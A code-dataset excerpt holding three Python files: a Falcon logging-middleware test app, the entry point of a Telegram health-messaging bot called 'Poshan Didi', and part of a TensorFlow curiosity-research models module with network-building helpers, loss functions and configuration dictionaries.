ba371eaf23d5032469dfe1818f54ece09f6d0052 | 1,384 | py | Python | tests/Custom/app.py | bcsummers/falcon-provider-logger | c91573d6f8906c3e7e76bd00738c96f3f311d9d1 | [
"Apache-2.0"
] | 1 | 2020-08-03T18:09:46.000Z | 2020-08-03T18:09:46.000Z | tests/Custom/app.py | bcsummers/falcon-provider-logger | c91573d6f8906c3e7e76bd00738c96f3f311d9d1 | [
"Apache-2.0"
] | null | null | null | tests/Custom/app.py | bcsummers/falcon-provider-logger | c91573d6f8906c3e7e76bd00738c96f3f311d9d1 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""Falcon app used for testing."""
# standard library
import logging
from typing import Any
# third-party
import falcon
# first-party
from falcon_provider_logger.middleware import LoggerMiddleware
class LoggerCustomLoggerResource:
"""Logger middleware testing resource."""
log = None
def on_get(self, req: falcon.Request, resp: falcon.Response) -> None:
"""Support GET method."""
key: str = req.get_param('key')
self.log.debug(f'DEBUG {key}')
self.log.info(f'INFO {key}')
self.log.warning(f'WARNING {key}')
self.log.error(f'ERROR {key}')
self.log.critical(f'CRITICAL {key}')
resp.body = f'Logged - {key}'
def on_post(self, req: falcon.Request, resp: falcon.Response) -> None:
"""Support POST method."""
key: str = req.get_param('key')
value: Any = req.get_param('value')
self.log.debug(f'DEBUG {key} {value}')
self.log.info(f'INFO {key} {value}')
self.log.warning(f'WARNING {key} {value}')
self.log.error(f'ERROR {key} {value}')
self.log.critical(f'CRITICAL {key} {value}')
resp.body = f'Logged - {key}'
logger: object = logging.getLogger('custom')
app_custom_logger = falcon.API(middleware=[LoggerMiddleware(logger=logger)])
app_custom_logger.add_route('/middleware', LoggerCustomLoggerResource())
| 31.454545 | 76 | 0.642341 | # -*- coding: utf-8 -*-
"""Falcon app used for testing."""
# standard library
import logging
from typing import Any
# third-party
import falcon
# first-party
from falcon_provider_logger.middleware import LoggerMiddleware
class LoggerCustomLoggerResource:
"""Logger middleware testing resource."""
log = None
def on_get(self, req: falcon.Request, resp: falcon.Response) -> None:
"""Support GET method."""
key: str = req.get_param('key')
self.log.debug(f'DEBUG {key}')
self.log.info(f'INFO {key}')
self.log.warning(f'WARNING {key}')
self.log.error(f'ERROR {key}')
self.log.critical(f'CRITICAL {key}')
resp.body = f'Logged - {key}'
def on_post(self, req: falcon.Request, resp: falcon.Response) -> None:
"""Support POST method."""
key: str = req.get_param('key')
value: Any = req.get_param('value')
self.log.debug(f'DEBUG {key} {value}')
self.log.info(f'INFO {key} {value}')
self.log.warning(f'WARNING {key} {value}')
self.log.error(f'ERROR {key} {value}')
self.log.critical(f'CRITICAL {key} {value}')
resp.body = f'Logged - {key}'
logger: object = logging.getLogger('custom')
app_custom_logger = falcon.API(middleware=[LoggerMiddleware(logger=logger)])
app_custom_logger.add_route('/middleware', LoggerCustomLoggerResource())
| 0 | 0 | 0 |
2504132d12d78a2baab76691825092820fad4917 | 4,063 | py | Python | poshan_didi_bot.py | dimagi/poshan-didi-server | dde1b3008c6ba9febf781f3df702ef91ee4b25f8 | [
"BSD-3-Clause"
] | 2 | 2019-06-14T11:37:37.000Z | 2020-04-16T08:30:43.000Z | poshan_didi_bot.py | dimagi/poshan-didi-server | dde1b3008c6ba9febf781f3df702ef91ee4b25f8 | [
"BSD-3-Clause"
] | 5 | 2020-01-28T22:44:22.000Z | 2022-02-10T00:10:07.000Z | poshan_didi_bot.py | dimagi/poshan-didi-server | dde1b3008c6ba9febf781f3df702ef91ee4b25f8 | [
"BSD-3-Clause"
] | 1 | 2020-12-03T19:48:28.000Z | 2020-12-03T19:48:28.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Poshan Didi!
"""
import logging
import logging.handlers
import beneficiary_bot
import nurse_bot
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
from simple_settings import settings
from registration import registration_conversation
# Enable logging
logging.basicConfig(filename=settings.LOG_FILENAME,
format=settings.LOG_FORMAT,
level=settings.LOG_LEVEL)
logger = logging.getLogger(__name__)
handler = logging.handlers.RotatingFileHandler(
settings.LOG_FILENAME,
maxBytes=10*1024*1024,
backupCount=100
)
logger.addHandler(handler)
# Define a few command handlers. These usually take the two arguments bot and
# update. Error handlers also receive the raised TelegramError object in error.
def error(update, context):
"""Log Errors caused by Updates."""
logger.warning('Update "%s" caused error "%s"', update, context.error)
def main():
"""Start the bot."""
beneficiary_bot.setup_state_machines()
# Create the Updater and pass it the bot's token.
# Make sure to set use_context=True to use the new context based callbacks
updater = Updater(settings.TELEGRAM_TOKEN, use_context=True)
# Get the dispatcher to register handlers
dp = updater.dispatcher
# Add the regsitration conversation, which handles the /start command
dp.add_handler(registration_conversation)
# Add a nurse command to skip the current escalated message
# (only allow the nurse to access this command)
# dp.add_handler(CommandHandler('noreply', nurse_bot.skip,
# Filters.chat(settings.NURSE_CHAT_ID)))
# Add a nurse command to set state for a user (only allow the nurse to access this command)
# dp.add_handler(CommandHandler('state', nurse_bot.set_state,
# Filters.chat(settings.NURSE_CHAT_ID)))
# Add a nurse command to set state for a user (only allow the nurse to access this command)
# dp.add_handler(CommandHandler('state', nurse_bot.set_super_state,
# Filters.chat(settings.GOD_MODE)))
# dp.add_handler(CommandHandler('cohortstate', nurse_bot.set_cohort_super_state,
# Filters.chat(settings.GOD_MODE)))
# Add a nurse command to set state for a user (only allow the nurse to access this command)
# dp.add_handler(CommandHandler('send_next_modules', nurse_bot.send_next_modules,
# Filters.chat(settings.GOD_MODE)))
# Add a nurse command to set state for a user (only allow the nurse to access this command)
# dp.add_handler(CommandHandler('vhnd', nurse_bot.send_vhnd_reminder,
# Filters.chat(settings.GOD_MODE)))
# sign off messages
dp.add_handler(CommandHandler('sendglobal', nurse_bot.send_global_msg,
Filters.chat(settings.GOD_MODE)))
# on non-command i.e., a normal message message - process_user_input the
# message from Telegram. Use different handlers for the nurse and user
# messages
dp.add_handler(MessageHandler(
(Filters.text & (~ Filters.chat(settings.NURSE_CHAT_ID))), beneficiary_bot.all_done))
# dp.add_handler(MessageHandler(
# (Filters.text & (~ Filters.chat(settings.NURSE_CHAT_ID))), beneficiary_bot.process_user_input))
# dp.add_handler(MessageHandler(
# (Filters.text & Filters.chat(settings.NURSE_CHAT_ID)), nurse_bot.process_nurse_input))
# log all errors
dp.add_error_handler(error)
logger.info(
'************************** POSHAN DIDI HAS RETURNED **************************')
# Start the Bot.
updater.start_polling()
# Run the bot until you press Ctrl-C or the process receives SIGINT,
# SIGTERM or SIGABRT. This should be used most of the time, since
# start_polling() is non-blocking and will stop the bot gracefully.
updater.idle()
if __name__ == '__main__':
main()
| 38.695238 | 105 | 0.679793 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Poshan Didi!
"""
import logging
import logging.handlers
import beneficiary_bot
import nurse_bot
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
from simple_settings import settings
from registration import registration_conversation
# Enable logging
logging.basicConfig(filename=settings.LOG_FILENAME,
format=settings.LOG_FORMAT,
level=settings.LOG_LEVEL)
logger = logging.getLogger(__name__)
handler = logging.handlers.RotatingFileHandler(
settings.LOG_FILENAME,
maxBytes=10*1024*1024,
backupCount=100
)
logger.addHandler(handler)
# Define a few command handlers. These usually take the two arguments bot and
# update. Error handlers also receive the raised TelegramError object in error.
def error(update, context):
"""Log Errors caused by Updates."""
logger.warning('Update "%s" caused error "%s"', update, context.error)
def main():
"""Start the bot."""
beneficiary_bot.setup_state_machines()
# Create the Updater and pass it the bot's token.
# Make sure to set use_context=True to use the new context based callbacks
updater = Updater(settings.TELEGRAM_TOKEN, use_context=True)
# Get the dispatcher to register handlers
dp = updater.dispatcher
# Add the regsitration conversation, which handles the /start command
dp.add_handler(registration_conversation)
# Add a nurse command to skip the current escalated message
# (only allow the nurse to access this command)
# dp.add_handler(CommandHandler('noreply', nurse_bot.skip,
# Filters.chat(settings.NURSE_CHAT_ID)))
# Add a nurse command to set state for a user (only allow the nurse to access this command)
# dp.add_handler(CommandHandler('state', nurse_bot.set_state,
# Filters.chat(settings.NURSE_CHAT_ID)))
# Add a nurse command to set state for a user (only allow the nurse to access this command)
# dp.add_handler(CommandHandler('state', nurse_bot.set_super_state,
# Filters.chat(settings.GOD_MODE)))
# dp.add_handler(CommandHandler('cohortstate', nurse_bot.set_cohort_super_state,
# Filters.chat(settings.GOD_MODE)))
# Add a nurse command to set state for a user (only allow the nurse to access this command)
# dp.add_handler(CommandHandler('send_next_modules', nurse_bot.send_next_modules,
# Filters.chat(settings.GOD_MODE)))
# Add a nurse command to set state for a user (only allow the nurse to access this command)
# dp.add_handler(CommandHandler('vhnd', nurse_bot.send_vhnd_reminder,
# Filters.chat(settings.GOD_MODE)))
# sign off messages
dp.add_handler(CommandHandler('sendglobal', nurse_bot.send_global_msg,
Filters.chat(settings.GOD_MODE)))
# on non-command i.e., a normal message message - process_user_input the
# message from Telegram. Use different handlers for the nurse and user
# messages
dp.add_handler(MessageHandler(
(Filters.text & (~ Filters.chat(settings.NURSE_CHAT_ID))), beneficiary_bot.all_done))
# dp.add_handler(MessageHandler(
# (Filters.text & (~ Filters.chat(settings.NURSE_CHAT_ID))), beneficiary_bot.process_user_input))
# dp.add_handler(MessageHandler(
# (Filters.text & Filters.chat(settings.NURSE_CHAT_ID)), nurse_bot.process_nurse_input))
# log all errors
dp.add_error_handler(error)
logger.info(
'************************** POSHAN DIDI HAS RETURNED **************************')
# Start the Bot.
updater.start_polling()
# Run the bot until you press Ctrl-C or the process receives SIGINT,
# SIGTERM or SIGABRT. This should be used most of the time, since
# start_polling() is non-blocking and will stop the bot gracefully.
updater.idle()
if __name__ == '__main__':
main()
| 0 | 0 | 0 |
445b411ea6aba700be77b4ec60ac04e0382d24d7 | 94,119 | py | Python | curiosity/interaction/models.py | neuroailab/curiosity_deprecated | 65f7cde13b07cdac52eed39535a94e7544c396b8 | [
"Apache-2.0"
] | null | null | null | curiosity/interaction/models.py | neuroailab/curiosity_deprecated | 65f7cde13b07cdac52eed39535a94e7544c396b8 | [
"Apache-2.0"
] | 2 | 2017-11-18T00:53:33.000Z | 2017-11-18T00:53:40.000Z | curiosity/interaction/models.py | neuroailab/curiosity_deprecated | 65f7cde13b07cdac52eed39535a94e7544c396b8 | [
"Apache-2.0"
] | null | null | null | '''
Policy and intrinsic reward models.
'''
import numpy as np
import tensorflow as tf
from curiosity.models.model_building_blocks import ConvNetwithBypasses
from curiosity.models import explicit_future_prediction_base as fp_base
from curiosity.models import jerk_models
import distutils.version
use_tf1 = distutils.version.LooseVersion(tf.VERSION) >= distutils.version.LooseVersion('1.0.0')
#TODO replace all these makeshift helpers
def postprocess_depths(depths):
'''
Assumes depths is of shape [batch_size, time_number, height, width, 3]
'''
depths = tf.cast(depths, tf.float32)
depths = (depths[:,:,:,:,0:1] * 256. + depths[:,:,:,:,1:2] + \
depths[:,:,:,:,2:3] / 256.0) / 1000.0
depths /= 4. # normalization
return depths
default_damian_cfg = jerk_models.cfg_mom_complete_bypass(768, use_segmentation=False,
method='concat', nonlin='relu')
default_damian_cfg.update({'state_shape' : [2, 128, 170, 3], 'action_shape' : [2, 8]})
sample_depth_future_cfg = {
'state_shape' : [2, 64, 64, 3],
'action_shape' : [2, 8],
'action_join' : {
'reshape_dims' : [8, 8, 5],
'mlp' : {
'hidden_depth' : 2,
'hidden' : {
1 : {'num_features' : 320, 'dropout' : .75},
2 : {'num_features' : 320, 'activation' : 'identity'}
}
}
},
'encode' : {
'encode_depth' : 3,
'encode' : {
1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
2 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
}
},
'deconv' : {
'deconv_depth' : 3,
'deconv' : {
1 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}, 'bypass' : 0},
2 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}, 'bypass' : 0},
3 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 1}, 'bypass' : 0}
}
}
}
a_bigger_depth_future_config = {
'state_shape' : [2, 64, 64, 3],
'action_shape' : [2, 8],
'action_join' : {
'reshape_dims' : [8, 8, 5],
'mlp' : {
'hidden_depth' : 3,
'hidden' : {
1 : {'num_features' : 320},
2 : {'num_features' : 320},
3 : {'num_features' : 320, 'activation' : 'identity'}
}
}
},
'encode' : {
'encode_depth' : 5,
'encode' : {
1 : {'conv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}},
2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
3 : {'conv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}},
4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
5 : {'conv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 5}},
}
},
'deconv' : {
'deconv_depth' : 5,
'deconv' : {
1 : {'deconv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}, 'bypass' : 4},
2 : {'deconv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}, 'bypass' : 3},
3 : {'deconv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}, 'bypass' : 2},
4 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}, 'bypass' : 1},
5 : {'deconv' : {'filter_size' : 5, 'stride' : 1, 'num_filters' : 1}, 'bypass' : 0}
}
}
}
hourglass_latent_model_cfg = {
'state_shape' : [2, 64, 64, 3],
'action_shape' : [2, 8],
'encode' : {
'encode_depth' : 4,
'encode' : {
1: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
2: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
3: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
4: {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 8}}
}
},
'action_model' : {
'mlp' : {
'hidden_depth' : 2,
'hidden' : {
1: {'num_features' : 256},
2: {'num_features' : 16, 'activation' : 'identity'}
}
}
},
'future_model' : {
'mlp' : {
'hidden_depth' : 2,
'hidden' : {
1: {'num_features' : 256},
2: {'num_features' : 128, 'activation' : 'identity'}
}
},
'reshape_dims' : [4, 4, 8],
'deconv' : {
'deconv_depth' : 3,
'deconv' : {
1 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 16}, 'bypass' : 0},
2 : {'deconv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 16}, 'bypass' : 0},
3 : {'deconv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 8}, 'bypass' : 0}
}
}
}
}
mario_world_model_config = {
'state_shape' : [2, 64, 64, 3],
'action_shape' : [2, 8],
'encode' : {
'encode_depth' : 4,
'encode' : {
1: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
2: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
3: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
4: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}}
}
},
'action_model' : {
'mlp' : {
'hidden_depth' : 2,
'hidden' : {
1: {'num_features' : 256},
2: {'num_features' : 16, 'activation' : 'identity'}
}
}
},
'future_model' : {
'mlp' : {
'hidden_depth' : 2,
'hidden' : {
1: {'num_features' : 512},
2: {'num_features' : 512, 'activation' : 'identity'}
}
}
}
}
class MixedUncertaintyModel:
'''For both action and future uncertainty prediction, simultaneously, as separate predictions.
Consider merging with UncertaintyModel, but right now that might look too messy. Want to leave that functionality alone.
'''
class ObjectThereWorldModel:
'''
A dummy oracle world model that just says the true value of whether an object is in the field of view.
'''
class ForceMagSquareWorldModel:
'''
Similar to the above, but just gives the square of the force.
'''
sample_cfg = {
'uncertainty_model' : {
'state_shape' : [2, 64, 64, 3],
'action_dim' : 8,
'n_action_samples' : 50,
'encode' : {
'encode_depth' : 3,
'encode' : {
1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
2 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
}
},
'mlp' : {
'hidden_depth' : 2,
'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
2 : {'num_features' : 1, 'activation' : 'identity'}
}
}
},
'world_model' : sample_depth_future_cfg,
'seed' : 0
}
another_sample_cfg = {
'uncertainty_model' : {
'state_shape' : [2, 64, 64, 3],
'action_dim' : 8,
'n_action_samples' : 50,
'encode' : {
'encode_depth' : 5,
'encode' : {
1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
5 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
}
},
'mlp' : {
'hidden_depth' : 2,
'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
2 : {'num_features' : 1, 'activation' : 'identity'}
}
}
},
'world_model' : a_bigger_depth_future_config,
'seed' : 0
}
default_damian_full_cfg = {
'uncertainty_model' : {
'state_shape' : [2, 128, 170, 3],
'action_dim' : 8,
'n_action_samples' : 50,
'encode' : {
'encode_depth' : 5,
'encode' : {
1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
5 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
}
},
'mlp' : {
'hidden_depth' : 2,
'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
2 : {'num_features' : 1, 'activation' : 'identity'}
}
}
},
'world_model' : default_damian_cfg,
'seed' : 0
}
| 45.446161 | 239 | 0.591772 | '''
Policy and intrinsic reward models.
'''
import numpy as np
import tensorflow as tf
from curiosity.models.model_building_blocks import ConvNetwithBypasses
from curiosity.models import explicit_future_prediction_base as fp_base
from curiosity.models import jerk_models
import distutils.version
use_tf1 = distutils.version.LooseVersion(tf.VERSION) >= distutils.version.LooseVersion('1.0.0')
def tf_concat(list_of_tensors, axis = 0):
if use_tf1:
return tf.concat(list_of_tensors, axis)
return tf.concat(axis, list_of_tensors)
#TODO replace all these makeshift helpers
def normalized_columns_initializer(std=1.0):
def _initializer(shape, dtype=None, partition_info=None):
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None, reuse_weights = False):
with tf.variable_scope(name, reuse = reuse_weights):
stride_shape = [1, stride[0], stride[1], 1]
filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = np.prod(filter_shape[:3])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = np.prod(filter_shape[:2]) * num_filters
# initialize weights with random weights
w_bound = np.sqrt(6. / (fan_in + fan_out))
w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
collections=collections)
b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.constant_initializer(0.0),
collections=collections)
return tf.nn.conv2d(x, w, stride_shape, pad) + b, w, b
def linear(x, size, name, initializer=None, bias_init=0):
w = tf.get_variable(name + "/w", [x.get_shape()[1], size], initializer=initializer)
b = tf.get_variable(name + "/b", [size], initializer=tf.constant_initializer(bias_init))
return tf.matmul(x, w) + b, w, b
class UniformActionSampler:
def __init__(self, cfg):
if 'act_dim' in cfg['world_model']:
self.action_dim = cfg['world_model']['act_dim']
else:
self.action_dim = cfg['world_model']['action_shape'][1]
self.num_actions = cfg['uncertainty_model']['n_action_samples']
self.rng = np.random.RandomState(cfg['seed'])
def sample_actions(self):
return self.rng.uniform(-1., 1., [self.num_actions, self.action_dim])
def postprocess_depths(depths):
'''
Assumes depths is of shape [batch_size, time_number, height, width, 3]
'''
depths = tf.cast(depths, tf.float32)
depths = (depths[:,:,:,:,0:1] * 256. + depths[:,:,:,:,1:2] + \
depths[:,:,:,:,2:3] / 256.0) / 1000.0
depths /= 4. # normalization
return depths
def postprocess_std(in_node):
in_node = tf.cast(in_node, tf.float32)
in_node = in_node / 255.
return in_node
def flatten(x):
return tf.reshape(x, [-1, np.prod(x.get_shape().as_list()[1:])])
def categorical_sample(logits, d, one_hot = True):
value = tf.squeeze(tf.multinomial(logits - tf.reduce_max(logits, [1], keep_dims=True), 1), [1])
if not one_hot:
return value
return tf.one_hot(value, d)
def deconv_loop(input_node, m, cfg, desc = 'deconv', bypass_nodes = None,
reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False, do_print = True, return_bypass=False, sub_bypass = None):
m.output = input_node
deconv_nodes = [input_node]
# deconvolving
deconv_depth = cfg[desc + '_depth']
cfs0 = None
if bypass_nodes is None:
bypass_nodes = [m.output]
for i in range(1, deconv_depth + 1):
with tf.variable_scope(desc + str(i)) as scope:
if reuse_weights:
scope.reuse_variables()
bypass = cfg[desc][i].get('bypass')
if bypass is not None:
if type(bypass) == list:
bypass_node = [bypass_nodes[bp] for bp in bypass]
elif type(bypass) == dict:
if sub_bypass is None:
raise ValueError('Bypass \
is dict but no sub_bypass specified')
for k in bypass:
if int(k) == sub_bypass:
if type(bypass[k]) == list:
bypass_node = [bypass_nodes[bp] \
for bp in bypass[k]]
else:
bypass_node = bypass_nodes[bypass[k]]
else:
bypass_node = bypass_nodes[bypass]
m.add_bypass(bypass_node)
bn = cfg[desc][i]['deconv'].get('batch_normalize')
if bn:
norm_it = bn
else:
norm_it = batch_normalize
with tf.contrib.framework.arg_scope([m.deconv],
init='xavier', stddev=.01, bias=0, batch_normalize = norm_it):
cfs = cfg[desc][i]['deconv']['filter_size']
cfs0 = cfs
nf = cfg[desc][i]['deconv']['num_filters']
cs = cfg[desc][i]['deconv']['stride']
if 'output_shape' in cfg[desc][i]['deconv']:
out_shape = cfg[desc][i]['deconv']['output_shape']
else:
out_shape = None
if no_nonlinearity_end and i == deconv_depth:
m.deconv(nf, cfs, cs, activation = None,
fixed_output_shape=out_shape)
else:
my_activation = cfg[desc][i].get('nonlinearity')
if my_activation is None:
my_activation = 'relu'
m.deconv(nf, cfs, cs, activation = my_activation,
fixed_output_shape=out_shape)
if do_print:
print('deconv out:', m.output)
#TODO add print function
pool = cfg[desc][i].get('pool')
if pool:
pfs = pool['size']
ps = pool['stride']
m.pool(pfs, ps)
deconv_nodes.append(m.output)
bypass_nodes.append(m.output)
if return_bypass:
return [deconv_nodes, bypass_nodes]
return deconv_nodes
def feedforward_conv_loop(input_node, m, cfg, desc = 'encode', bypass_nodes = None, reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False, do_print=True, return_bypass=False, sub_bypass = None):
m.output = input_node
encode_nodes = [input_node]
#encoding
encode_depth = cfg[desc + '_depth']
cfs0 = None
if bypass_nodes is None:
bypass_nodes = [m.output]
for i in range(1, encode_depth + 1):
#not sure this usage ConvNet class creates exactly the params that we want to have, specifically in the 'input' field, but should give us an accurate record of this network's configuration
with tf.variable_scope(desc + str(i)) as scope:
if reuse_weights:
scope.reuse_variables()
bypass = cfg[desc][i].get('bypass')
if bypass:
if type(bypass) == list:
bypass_node = [bypass_nodes[bp] for bp in bypass]
elif type(bypass) == dict:
if sub_bypass is None:
raise ValueError('Bypass \
is dict but no sub_bypass specified')
for k in bypass:
if int(k) == sub_bypass:
if type(bypass[k]) == list:
bypass_node = [bypass_nodes[bp] \
for bp in bypass[k]]
else:
bypass_node = bypass_nodes[bypass[k]]
else:
bypass_node = bypass_nodes[bypass]
m.add_bypass(bypass_node)
bn = cfg[desc][i]['conv'].get('batch_normalize')
if bn:
norm_it = bn
else:
norm_it = batch_normalize
with tf.contrib.framework.arg_scope([m.conv], init='xavier', stddev=.01, bias=0, batch_normalize = norm_it):
cfs = cfg[desc][i]['conv']['filter_size']
cfs0 = cfs
nf = cfg[desc][i]['conv']['num_filters']
cs = cfg[desc][i]['conv']['stride']
if no_nonlinearity_end and i == encode_depth:
m.conv(nf, cfs, cs, activation = None)
else:
my_activation = cfg[desc][i].get('nonlinearity')
if my_activation is None:
my_activation = 'relu'
m.conv(nf, cfs, cs, activation = my_activation)
#TODO add print function
pool = cfg[desc][i].get('pool')
if pool:
pfs = pool['size']
ps = pool['stride']
m.pool(pfs, ps)
encode_nodes.append(m.output)
bypass_nodes.append(m.output)
if return_bypass:
return [encode_nodes, bypass_nodes]
return encode_nodes
def action_softmax_loss(prediction, tv, num_classes = 21, min_value = -1., max_value = 1.):
#get into the right shape
tv_shape = tv.get_shape().as_list()
pred_shape = prediction.get_shape().as_list()
print(tv_shape)
print(pred_shape)
assert len(tv_shape) == 2 and tv_shape[1] * num_classes == pred_shape[1], (len(tv_shape), tv_shape[1] * num_classes, pred_shape[1])
pred = tf.reshape(prediction, [-1, tv_shape[1], num_classes])
#discretize tv
tv = float(num_classes) * (tv - min_value) / (max_value - min_value)
tv = tf.cast(tv, tf.int32)
loss_per_example = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
labels = tv, logits = pred), axis = 1, keep_dims = True)
loss = tf.reduce_mean(loss_per_example)
return loss_per_example, loss
def softmax_cross_entropy_loss_vel_one(outputs, tv, gpu_id = 0, eps = 0.0,
min_value = -1.0, max_value = 1.0, num_classes=256,
segmented_jerk=True, **kwargs):
#with tf.device('/gpu:%d' % gpu_id):
undersample = False
if undersample:
thres = 0.5412
mask = tf.norm(outputs['jerk_all'], ord='euclidean', axis=2)
mask = tf.cast(tf.logical_or(tf.greater(mask[:,0], thres),
tf.greater(mask[:,1], thres)), tf.float32)
mask = tf.reshape(mask, [mask.get_shape().as_list()[0], 1, 1, 1])
else:
mask = 1
shape = outputs['pred_next_vel_1'].get_shape().as_list()
assert shape[3] / 3 == num_classes
losses = []
# next image losses
logits = outputs['next_images'][1][0]
logits = tf.reshape(logits, shape[0:3] + [3, shape[3] / 3])
labels = tf.cast(tv, tf.int32)
loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits) * mask)
losses.append(loss)
assert len(losses) == 1, ('loss length: %d' % len(losses))
losses = tf.stack(losses)
return tf.reduce_mean(losses)
default_damian_cfg = jerk_models.cfg_mom_complete_bypass(768, use_segmentation=False,
method='concat', nonlin='relu')
default_damian_cfg.update({'state_shape' : [2, 128, 170, 3], 'action_shape' : [2, 8]})
class DamianModel:
def __init__(self, cfg = None, time_seen = 3):
self.s_i = x = tf.placeholder(tf.float32, [1] + cfg['state_shape'])
self.s_f = s_f = tf.placeholder(tf.float32, [1] + cfg['state_shape'])
self.objects = objects = tf.placeholder(tf.float32, [1] + cfg['state_shape'])
self.action = action = tf.placeholder(tf.float32, [1, 2, cfg['action_dim']])
self.action_id = action_id = tf.placeholder(tf.int32, [1, 2])
bs = tf.to_float(tf.shape(self.s_i)[0])
final_img_unsqueezed = self.s_f[:, 1:]
depths = tf_concat([self.s_i, final_img_unsqueezed], 1)
inputs = replace_base(depths, objects, action, action_id)
self.processed_input = inputs
for k, inpt in inputs.iteritems():
print(k)
print(inpt)
#then gotta postprocess things to be of the right form, get a thing called inputs out of it
self.model_results, _ = mom_complete(inputs, cfg = cfg, time_seen = time_seen)
self.pred = self.model_results['next_images']
self.tv = inputs['tv']
self.loss = softmax_cross_entropy_loss_vel_one(self.model_results, self.tv, segmented_jerk = False, buckets = 255)
def replace_base(depths, objects, action, action_id):
inputs = {'depths' : depths, 'objects' : objects, 'actions' : action}
rinputs = {}
for k in inputs:
if k in ['depths', 'objects']:
rinputs[k] = tf.pad(inputs[k],
[[0,0], [0,0], [0,0], [3,3], [0,0]], "CONSTANT")
# RESIZING IMAGES
rinputs[k] = tf.unstack(rinputs[k], axis=1)
for i, _ in enumerate(rinputs[k]):
rinputs[k][i] = tf.image.resize_images(rinputs[k][i], [64, 88])
rinputs[k] = tf.stack(rinputs[k], axis=1)
else:
rinputs[k] = inputs[k]
objects = tf.cast(rinputs['objects'], tf.int32)
shape = objects.get_shape().as_list()
objects = tf.unstack(objects, axis=len(shape)-1)
objects = objects[0] * (256**2) + objects[1] * 256 + objects[2]
action_id = tf.expand_dims(action_id, 2)
action_id = tf.cast(tf.reshape(tf.tile(action_id, [1, 1, shape[2] * shape[3]]), shape[:-1]), tf.int32)
actions = tf.cast(tf.equal(objects, action_id), tf.float32)
actions = tf.tile(tf.expand_dims(actions, axis = 4), [1, 1, 1, 1, 6])
actions *= tf.expand_dims(tf.expand_dims(action[:, :, 2:], 2), 2)
ego_motion = tf.expand_dims(tf.expand_dims(action[:, :, :2], 2), 2)
ego_motion = tf.tile(ego_motion, [1, 1, shape[2], shape[3], 1])
action_map = tf_concat([actions, ego_motion], -1)
action_map = tf.expand_dims(action_map, -1)
inputs = {'actions_map' : action_map, 'depths' : postprocess_depths(rinputs['depths']), 'tv' : rinputs['depths'][:, -1] }
return inputs
def mom_complete(inputs, cfg = None, time_seen = None, normalization_method = None,
stats_file = None, obj_pic_dims = None, scale_down_height = None,
